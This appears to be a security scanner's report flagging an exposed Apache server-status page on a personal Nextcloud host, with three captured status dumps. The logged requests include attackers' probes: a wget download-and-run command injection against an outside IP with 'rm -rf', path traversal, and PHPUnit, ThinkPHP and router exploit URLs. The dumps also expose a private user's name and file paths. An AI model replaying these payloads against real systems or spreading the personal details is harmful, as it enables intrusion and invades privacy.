SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48058822ec5b
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2022-06-14T12:30:21 Current Time: Thursday, 01-Dec-2022 00:07:46 UTC Restart Time: Thursday, 27-Oct-2022 15:15:21 UTC Parent Server Config. Generation: 42 Parent Server MPM Generation: 41 Server uptime: 34 days 8 hours 52 minutes 25 seconds Server load: 0.00 0.00 0.00 Total accesses: 105160 - Total Traffic: 59.2 GB - Total Duration: 58994577 CPU Usage: u94.6 s178.61 cu3286.83 cs1452.76 - .169% CPU load .0354 requests/sec - 20.9 kB/second - 0.6 MB/request - 560.998 ms/request 11 requests currently being processed, 39 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 2451754no0yes916000 3451755no0yes223000 Sum200 1139000 ..................................................WWWWWWWW______ __________W_________W_W_____________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33-0/0/1077. 0.00432462697873120.00.00464.46 34.226.203.45http/1.1 0-33-0/0/1055. 0.0043246202746530.00.00569.12 185.246.221.138http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-33-0/0/1152. 0.0043246204577500.00.00465.17 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 0-33-0/0/1086. 0.004324622266599040.00.00657.33 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/21/21/0/0 (open/recv/resp/push/rst) 0-33-0/0/1076. 0.0043246202586400.00.00544.58 50.31.21.6http/1.1localhost:80GET / HTTP/1.1 0-33-0/0/1145. 0.00432462743001220.00.00479.29 192.241.207.134http/1.1 0-33-0/0/1081. 0.0043246202750890.00.00436.63 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/16/16/0/0 (open/recv/resp/push/rst) 0-33-0/0/1058. 0.0043246222735310.00.00619.56 157.245.0.48http/1.1localhost:80\x16\x03\x01 0-33-0/0/1087. 0.0043246231974177660.00.00425.99 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/19/19/0/0 (open/recv/resp/push/rst) 0-33-0/0/1081. 0.004324622422745930.00.00711.88 92.184.117.244h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-33-0/0/1111. 0.0043246206793340.00.00642.91 157.245.0.48http/1.1localhost:80GET / HTTP/1.1 0-33-0/0/1092. 0.00432462742622350.00.00689.42 157.245.0.48http/1.1localhost:80\x16\x03\x01 0-33-0/0/1103. 0.00432462955351030.00.00430.81 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 0-33-0/0/1071. 0.00432462752606090.00.00484.39 34.226.203.45http/1.1 0-33-0/0/1164. 0.004324621136429230.00.00518.48 185.117.37.101http/1.1ravignon.mycloud.paris:443done, streams: 0/21/21/0/0 (open/recv/resp/push/rst) 0-33-0/0/1084. 0.00432462762790710.00.00469.78 50.31.21.6http/1.1 0-33-0/0/1168. 0.004324626473188460.00.00461.60 54.152.3.197http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33-0/0/1106. 0.0043246202854540.00.00452.43 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/15/15/0/0 (open/recv/resp/push/rst) 0-33-0/0/1085. 0.0043246232760610.00.00605.54 183.136.225.32http/1.1ravignon.mycloud.paris:443GET /core/img/favicon.ico HTTP/1.1 0-33-0/0/1055. 0.004324625973126330.00.00541.01 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-33-0/0/1125. 0.00432462784807640.00.00469.47 185.246.221.138http/1.1 0-33-0/0/1059. 0.004324622382509660.00.00438.65 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/20/20/0/0 (open/recv/resp/push/rst) 0-33-0/0/1080. 0.0043246204659170.00.00626.86 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/17/17/0/0 (open/recv/resp/push/rst) 0-33-0/0/1079. 0.004324621333266810.00.00611.14 157.245.0.48http/1.1 0-33-0/0/1073. 0.0043246202564100.00.00491.46 139.162.221.243http/1.1 1-33-0/0/1385. 0.0043246226311248950.00.001136.42 92.184.117.244h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon HTTP/2.0 1-33-0/0/1354. 0.0043246215243990.00.00687.38 87.236.176.24http/1.1localhost:80GET / HTTP/1.1 1-33-0/0/1349. 0.004324621553563090.00.00556.34 54.152.3.197http/1.1ravignon.mycloud.paris:443POST /.env HTTP/1.1 1-33-0/0/1365. 0.004324622674079310.00.00664.98 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 1-33-0/0/1352. 0.004324622849575280.00.001598.47 192.241.201.16http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 1-33-0/0/1459. 0.004324621573565820.00.00576.68 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 1-33-0/0/1351. 0.004324622958630660.00.00748.21 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 1-33-0/0/1374. 0.0043246219475676510.00.00650.71 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/43/43/0/0 (open/recv/resp/push/rst) 1-33-0/0/1427. 0.0043246215475148970.00.00530.01 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 1-33-0/0/1464. 0.004324622153679240.00.00670.62 54.152.3.197http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33-0/0/1405. 0.004324621134385290.00.00576.44 205.210.31.182http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33-0/0/1381. 0.004324622247324090.00.00618.51 139.162.221.243http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33-0/0/1421. 0.004324622147058210.00.00711.29 128.14.141.34http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33-0/0/1418. 0.004324622424998020.00.00640.55 185.180.143.141http/1.1ravignon.mycloud.paris:443GET /solr/ HTTP/1.1 1-33-0/0/1367. 0.004324621976846140.00.00649.70 54.152.3.197http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-33-0/0/1357. 0.004324621716546950.00.00748.67 185.180.143.141http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33-0/0/1377. 0.0043246203975070.00.001211.22 54.152.3.197http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33-0/0/1363. 0.00432462693692810.00.00730.88 185.246.221.138http/1.1 1-33-0/0/1427. 0.0043246222012518430.00.00735.80 183.136.225.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33-0/0/1371. 0.004324622434012930.00.00962.29 109.237.97.180http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33-0/0/1385. 0.0043246214924890.00.00583.99 103.41.39.190http/1.1localhost:80GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.41.39.190:52630/Moz 1-33-0/0/1344. 0.0043246218514452740.00.00913.42 92.184.117.244h2ravignon.mycloud.paris:443idle, streams: 0/59/59/0/0 (open/recv/resp/push/rst) 1-33-0/0/1473. 0.004324622824849170.00.001078.61 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-33-0/0/1415. 0.004324625735327090.00.00615.81 109.237.98.226http/1.1
No description available
Severity: medium
Fingerprint: c72c1c3018e67f2f18e67f2f9d6971f19d6971f1ff845e3bff845e3b2348749c
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2022-06-14T12:30:21 Current Time: Wednesday, 02-Nov-2022 09:53:06 UTC Restart Time: Thursday, 27-Oct-2022 15:15:21 UTC Parent Server Config. Generation: 11 Parent Server MPM Generation: 10 Server uptime: 5 days 18 hours 37 minutes 44 seconds Server load: 0.00 0.00 0.00 Total accesses: 6422 - Total Traffic: 174.2 MB - Total Duration: 1530896 CPU Usage: u19.71 s29.64 cu38.24 cs13.81 - .0203% CPU load .0129 requests/sec - 365 B/second - 27.8 kB/request - 238.383 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 034367no0yes124000 134368no0yes025000 Sum200 149000 ___________________W______________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-10343670/12/46_ 2.83215895290.00.071.55 161.35.188.242http/1.1 0-10343670/10/42_ 2.352114841520.00.060.22 161.35.188.242http/1.1 0-10343670/14/110_ 2.819134213450.00.090.63 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-10343670/14/49_ 2.992062610.00.080.25 161.35.188.242http/1.1ravignon.mycloud.paris:443GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e 0-10343670/13/45_ 2.88106364820.00.080.26 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-10343670/18/124_ 2.99159383140.00.165.19 161.35.188.242http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-10343670/13/43_ 2.764014377690.00.100.30 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-10343670/14/44_ 2.7124910116350.00.090.46 161.35.188.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-10343670/12/39_ 2.9026173520.00.060.21 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-10343670/13/47_ 2.651007570510.00.100.85 89.95.112.211http/1.1 0-10343670/15/54_ 2.924517988040.00.131.75 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-10343670/10/48_ 2.78238692750.00.072.11 161.35.188.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-10343670/11/73_ 2.91073180100.00.075.43 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-10343670/15/52_ 2.6010014486830.00.090.31 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-10343670/12/49_ 2.581014495590.00.100.76 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-10343670/17/69_ 2.7016774162780.00.120.46 161.35.188.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-10343670/17/73_ 2.8640924194580.00.130.38 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-10343670/14/54_ 2.84100166103160.00.100.29 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-10343670/16/44_ 2.924584121890.00.140.32 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-10343671/10/40W 2.5100108800.00.070.24 161.35.188.242http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-10343670/15/50_ 2.96157887610.00.101.80 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-10343670/14/42_ 2.8640105960500.00.100.26 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-10343670/14/47_ 2.714089882200.00.113.73 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-10343670/12/45_ 2.92457074120.00.094.39 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-10343670/16/45_ 2.971013499810.00.1212.83 161.35.188.242http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-10343680/7/158_ 1.812968385810.00.062.70 161.35.188.242http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-10343680/7/128_ 1.5819161296860.00.040.32 161.35.188.242http/1.1 1-10343680/6/130_ 1.6413083385310.00.0625.10 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-10343680/12/136_ 1.72251323470.00.071.63 89.95.112.211http/1.1 1-10343680/12/135_ 1.86173399350.00.092.46 161.35.188.242http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-10343680/6/155_ 1.152571361110.00.045.06 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-10343680/7/134_ 1.7270111391400.00.0519.90 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-10343680/11/128_ 1.797575367860.00.070.33 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-10343680/7/184_ 1.57281911456350.00.071.48 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-10343680/6/230_ 1.652681594820.00.046.06 161.35.188.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-10343680/10/143_ 1.7318120358040.00.080.41 161.35.188.242http/1.1 1-10343680/8/149_ 1.531109497970.00.054.25 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-10343680/7/184_ 1.870140520730.00.060.56 161.35.188.242http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-10343680/9/144_ 1.8610393000.00.061.24 161.35.188.242http/1.1ravignon.mycloud.paris:443GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e 1-10343680/10/139_ 1.741559366130.00.070.47 161.35.188.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-10343680/11/117_ 1.752141260580.00.062.27 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-10343680/8/144_ 1.6111126406070.00.051.35 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-10343680/6/135_ 1.526120428610.00.050.62 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-10343680/10/155_ 1.84781393970.00.091.45 128.14.209.162http/1.1ravignon.mycloud.paris:443GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 1-10343680/11/164_ 1.8520520580.00.073.68 161.35.188.242http/1.1ravignon.mycloud.paris:443PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 1-10343680/8/148_ 1.6014106365020.00.060.35 161.35.188.242http/1.1 1-10343680/7/119_ 1.780127273830.00.050.31 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-10343680/9/127_ 1.5413079337430.00.050.61 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-10343680/7/170_ 1.727076996950.00.051.95 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-10343680/6/121_ 1.6012127287220.00.050.35 161.35.188.242http/1.1 2-8-0/0/27. 0.0012170408430.00.000.22 172.104.137.47http/1.1 2-8-0/0/21. 0.0012170406940.00.000.08 172.104.137.47http/1.1 2-8-0/0/23. 0.0012170404630.00.000.12 172.104.137.47http/1.1 2-8-0/0/22. 0.0012170404610.00.000.12 172.104.137.47http/1.1 2-8-0/0/53. 0.0012170469143930.00.003.42 146.88.240.10http/1.1 2-8-0/0/24. 0.0012170403030.00.000.09 18.185.47.255http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/r7Q8XTShnZKIiuaJCmAWD5JnDVZ0wHW 2-8-0/0/25. 0.0012170404050.00.000.18 18.218.109.211http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/r7Q8XTShnZKIiuaJCmAWD5JnDVZ0wHW 2-8-0/0/31. 0.00121704038610.00.0013.27 23.178.112.106http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/r7Q8XTShnZKIiuaJCmAWD5JnDVZ0wHW 2-8-0/0/16. 0.0012170401140.00.000.05 172.104.137.47http/1.1 2-8-0/0/28. 0.00121704011240.00.000.35 172.104.137.47http/1.1 2-8-0/0/23. 0.001217040105710.00.000.06 112.47.127.166http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 2-8-0/0/20. 0.0012170403060.00.000.15 172.104.137.47http/1.1 2-8-0/0/19. 0.0012170405410.00.000.13 92.118.39.78http/1.1localhost:80GET / HTTP/1.1 2-8-0/0/22. 0.0012170406380.00.000.11 172.104.137.47http/1.1 2-8-0/0/24. 0.001217048511200.00.000.15 159.203.44.173http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 2-8-0/0/23. 0.00121704010250.00.000.17 72.14.185.165http/1.1 2-8-0/0/17. 0.00121704556270.00.000.10 172.104.137.47http/1.1 2-8-0/0/24. 0.0012170405980.00.000.15 172.104.137.47http/1.1 2-8-0/0/23. 0.0012170414150.00.000.11 34.77.127.183http/1.1localhost:80GET / HTTP/1.1 2-8-0/0/23. 0.0012170405560.00.000.08 172.104.137.47http/1.1 2-8-0/0/18. 0.001217041217960.00.000.15 172.104.137.47http/1.1 2-8-0/0/50. 0.00121704077250.00.003.41 172.104.137.47http/1.1localhost:80GET /index.jhtml HTTP/1.1 2-8-0/0/24. 0.0012170409190.00.000.22 172.104.137.47http/1.1 2-8-0/0/17. 0.00121704065880.00.003.00 34.77.127.183http/1.1 2-8-0/0/24. 0.0012170415930.00.000.13 172.104.137.47http/1.1 3-8-0/0/28. 0.001217040118910.00.000.14 185.254.196.223http/1.1localhost:80GET /.env HTTP/1.1 3-8-0/0/29. 0.0012170407710.00.000.13 172.104.137.47http/1.1 3-8-0/0/31. 0.00121704015150.00.000.25 35.89.212.143http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/r7Q8XTShnZKIiuaJCmAWD5JnDVZ0wHW 3-8-0/0/29. 0.0012170406180.00.000.14 198.235.24.26http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 3-8-0/0/31. 0.00121704010930.00.000.20 138.197.148.237h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-8-0/0/29. 0.00121704114920.00.000.27 138.197.148.237h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-8-0/0/39. 0.00121704017920.00.000.28 138.197.148.237http/1.1 3-8-0/0/33. 0.00121704011500.00.000.24 193.47.61.99http/1.1 3-8-0/0/30. 0.00121704361680.00.0013.29 198.235.24.26http/1.1 3-8-0/0/32. 0.00121704014180.00.000.23 138.197.148.237h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-8-0/0/36. 0.0012170409930.00.000.36 193.47.61.99http/1.1localhost:80POST /GponForm/diag_Form?images/ HTTP/1.1 3-8-0/0/31. 0.0012170406170.00.000.19 72.14.185.165http/1.1 3-8-0/0/26. 0.0012170427550.00.000.17 138.197.148.237h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-8-0/0/33. 0.001217041817380.00.000.21 152.89.196.211http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 3-8-0/0/32. 0.00121704116680.00.000.24 185.254.196.223http/1.1localhost:80POST / HTTP/1.1 3-8-0/0/25. 0.00121704938410.00.000.14 138.197.148.237http/1.1 3-8-0/0/29. 0.00121704012350.00.000.17 138.197.148.237http/1.1 3-8-0/0/22. 0.001217040117110.00.000.11 138.197.148.237http/1.1 3-8-0/0/31. 0.0012170405790.00.000.17 138.197.148.237h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-8-0/0/27. 0.0012170406520.00.000.15 172.104.137.47http/1.1 3-8-0/0/27. 0.0012170419419360.00.000.28 138.197.148.237http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 3-8-0/0/29. 0.00121704010450.00.000.15 185.254.196.223http/1.1 3-8-0/0/32. 0.00121704017260.00.000.31 138.197.148.237http/1.1 3-8-0/0/32. 0.00121704012340.00.000.25 172.104.137.47http/1.1 3-8-0/0/27. 0.0012170409160.00.000.17 185.254.196.223http/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot SSL/TLS Session Cache Status: cache type: SHMCB, shared memory: 512000 bytes, current entries: 55subcaches: 32, indexes per subcache: 88time left on oldest entries' objects: avg: 139 seconds, (range: 13...298)index usage: 1%, cache usage: 2%total entries stored since starting: 962total entries replaced since starting: 0total entries expired since starting: 903total (pre-expiry) entries scrolled out of the cache: 0total retrieves since starting: 0 hit, 22 misstotal removes since starting: 4 hit, 2 miss Apache/2.4.52 (Ubuntu) Server at 109.190.179.92 Port 443
Severity: medium
Fingerprint: c72c1c3018e67f2f18e67f2f9d6971f19d6971f1ff845e3bff845e3b1ef3946e
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2022-06-14T12:30:21 Current Time: Sunday, 30-Oct-2022 03:40:18 UTC Restart Time: Thursday, 27-Oct-2022 15:15:21 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 2 days 12 hours 24 minutes 56 seconds Server load: 0.08 0.02 0.01 Total accesses: 4469 - Total Traffic: 95.5 MB - Total Duration: 1257922 CPU Usage: u7.38 s11.92 cu27.24 cs10.48 - .0262% CPU load .0205 requests/sec - 460 B/second - 21.9 kB/request - 281.477 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 216154no0yes025000 316155no0yes124000 Sum200 149000 ..................................................______________ _____________________________W______............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0-0/0/15. 0.0018600513652630.00.000.12 94.232.47.167http/1.1localhost:80\x03 0-0-0/0/17. 0.001860057018140.00.000.06 138.197.191.13http/1.1localhost:80\x16\x03\x01 0-0-0/0/75. 0.0018600575151010.00.000.41 185.83.144.103http/1.1localhost:80\x16\x03\x01\x01D\x01 0-0-0/0/14. 0.0018600513022260.00.000.06 79.124.62.106http/1.1localhost:80\x03 0-0-0/0/14. 0.001860057630090.00.000.05 138.197.191.13http/1.1localhost:80\x16\x03\x01 0-0-0/0/87. 0.00186005138324110.00.004.93 138.197.191.13http/1.1 0-0-0/0/11. 0.001860058130100.00.000.07 159.65.144.82http/1.1 0-0-0/0/9. 0.0018600524059100.00.000.20 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-0-0/0/16. 0.001860058733890.00.000.08 159.65.144.82http/1.1localhost:80\x16\x03\x01 0-0-0/0/13. 0.001860055514300.00.000.59 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-0-0/0/18. 0.00186005242110.00.000.20 183.136.225.35http/1.1localhost:80GET / HTTP/1.1 0-0-0/0/19. 0.0018600514041200.00.000.06 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-0-0/0/48. 0.0018600572156920.00.003.35 89.248.165.52http/1.1 0-0-0/0/21. 0.0018600522350150.00.000.11 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 0-0-0/0/16. 0.0018600518139310.00.000.51 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 0-0-0/0/34. 0.00186005154108810.00.000.20 167.172.56.1http/1.1 0-0-0/0/43. 0.0018600528027830.00.000.15 185.180.143.72http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-0-0/0/20. 0.0018600516724370.00.000.08 159.65.144.82http/1.1localhost:80\x16\x03\x01 0-0-0/0/8. 0.001860055243450.00.000.05 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-0-0/0/13. 0.0018600520039380.00.000.05 159.65.144.82http/1.1 0-0-0/0/16. 0.001860059325100.00.000.06 192.241.213.27http/1.1ravignon.mycloud.paris:443GET /version HTTP/1.1 0-0-0/0/19. 0.0018600520920760.00.000.08 183.136.225.35http/1.1 0-0-0/0/15. 0.0018600514433440.00.000.05 167.172.56.1http/1.1localhost:80\x16\x03\x01 0-0-0/0/12. 0.0018600523126300.00.000.65 152.89.196.211http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-0-0/0/14. 0.001860055345260.00.0012.61 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-0-0/0/135. 0.00186005176340200.00.000.68 152.89.196.211http/1.1ravignon.mycloud.paris:443POST /mifs/.;/services/LogService HTTP/1.1 1-0-0/0/111. 0.001860050278770.00.000.22 69.61.242.98http/1.1localhost:80GET /.env HTTP/1.1 1-0-0/0/116. 0.00186005162288290.00.000.65 138.197.191.13http/1.1 1-0-0/0/113. 0.0018600594274430.00.000.44 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /console/ HTTP/1.1 1-0-0/0/112. 0.001860051369200.00.002.30 183.136.225.35http/1.1localhost:80GET / HTTP/1.1 1-0-0/0/135. 0.00186005174321910.00.001.41 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 1-0-0/0/115. 0.00186005268294780.00.001.02 194.55.186.123http/1.1ravignon.mycloud.paris:443GET /explore HTTP/1.1 1-0-0/0/104. 0.001860052319320.00.000.21 89.248.165.52http/1.1 1-0-0/0/162. 0.001860052021428290.00.001.33 34.76.158.233http/1.1 1-0-0/0/204. 0.00186005164557030.00.005.87 138.197.191.13http/1.1localhost:80\x16\x03\x01 1-0-0/0/116. 0.001860050320950.00.000.21 138.197.191.13http/1.1 1-0-0/0/133. 0.001860050467050.00.004.15 185.83.144.103http/1.1localhost:80GET /.env HTTP/1.1 1-0-0/0/162. 0.00186005879478970.00.000.41 142.93.39.27http/1.1localhost:80\x16\x03\x01 1-0-0/0/123. 0.001860050365980.00.001.11 183.136.225.35http/1.1localhost:80GET /robots.txt HTTP/1.1 1-0-0/0/124. 0.0018600583353760.00.000.35 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/adminsandoz/ HTTP/1.1 1-0-0/0/95. 0.00186005425240750.00.002.15 183.129.153.157http/1.1ravignon.mycloud.paris:443GET /index.php/login HTTP/1.1 1-0-0/0/120. 0.001860050362840.00.001.14 183.136.225.35http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-0-0/0/120. 0.00186005914408890.00.000.52 167.172.56.1http/1.1 1-0-0/0/132. 0.00186005142361500.00.000.25 159.65.144.82http/1.1 1-0-0/0/138. 0.001860051490360.00.003.49 69.61.242.98http/1.1localhost:80POST / HTTP/1.1 1-0-0/0/126. 0.00186005154318560.00.000.20 192.241.214.10http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-0-0/0/101. 0.00186005125245530.00.000.16 94.232.47.167http/1.1localhost:80\x03 1-0-0/0/107. 0.00186005918300350.00.000.49 89.248.165.52http/1.1 1-0-0/0/152. 0.00186005242978340.00.001.81 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /index.php?s=/Index/\\think\\app/invokefunction&function=call 1-0-0/0/107. 0.00186005218273740.00.000.26 